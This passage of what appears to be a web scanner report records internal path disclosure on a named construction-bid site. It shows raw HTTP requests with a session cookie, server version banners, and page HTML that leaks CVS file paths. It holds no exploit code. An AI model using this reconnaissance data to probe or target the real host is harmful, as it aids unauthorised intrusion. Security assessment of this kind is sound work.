width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="11"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html |
Identified Internal Path(s)
/home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8722
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F03%2F2011&group=11&provider=765295&sortType=1#cat03/03/2011">Letting Date 03/03/2011</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F03%2F2011&group=11&provider=453856&sortType=1&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F03%2F2011&group=11&provider=453856&sortType=1&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F07%2F2011&group=11&provider=765295&sortType=1#cat03/07/2011">Letting Date 03/07/2011</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F07%2F2011&group=11&provider=453856&sortType=1&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F24%2F2011&group=11&provider=765295&sortType=1#cat03/24/2011">Letting Date 03/24/2011</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F24%2F2011&group=11&provider=453856&sortType=1&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="11"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8722
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F03%2F2011&group=11&provider=765295&sortType=1#cat03/03/2011">Letting Date 03/03/2011</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F03%2F2011&group=11&provider=453856&sortType=1&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F03%2F2011&group=11&provider=453856&sortType=1&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F07%2F2011&group=11&provider=765295&sortType=1#cat03/07/2011">Letting Date 03/07/2011</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F07%2F2011&group=11&provider=453856&sortType=1&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F24%2F2011&group=11&provider=765295&sortType=1#cat03/24/2011">Letting Date 03/24/2011</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=03%2F24%2F2011&group=11&provider=453856&sortType=1&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="11"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/action/IPPshowProjData
/qap/action/IPPshowProjData |
Identified Internal Path(s)
/home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v
Request
GET /qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21107
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1438657&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1438657&group=11&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat324403"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=11&provider=453856#cat324403">Sewer and Water Construction ( 1 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat1048445"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=1048445&group=11&provider=453856#cat1048445">Water Resources Infrastructure ( 3 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16<span><span class="prj_num">(#1438657)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Oliver - Beulah, ND</span></td> 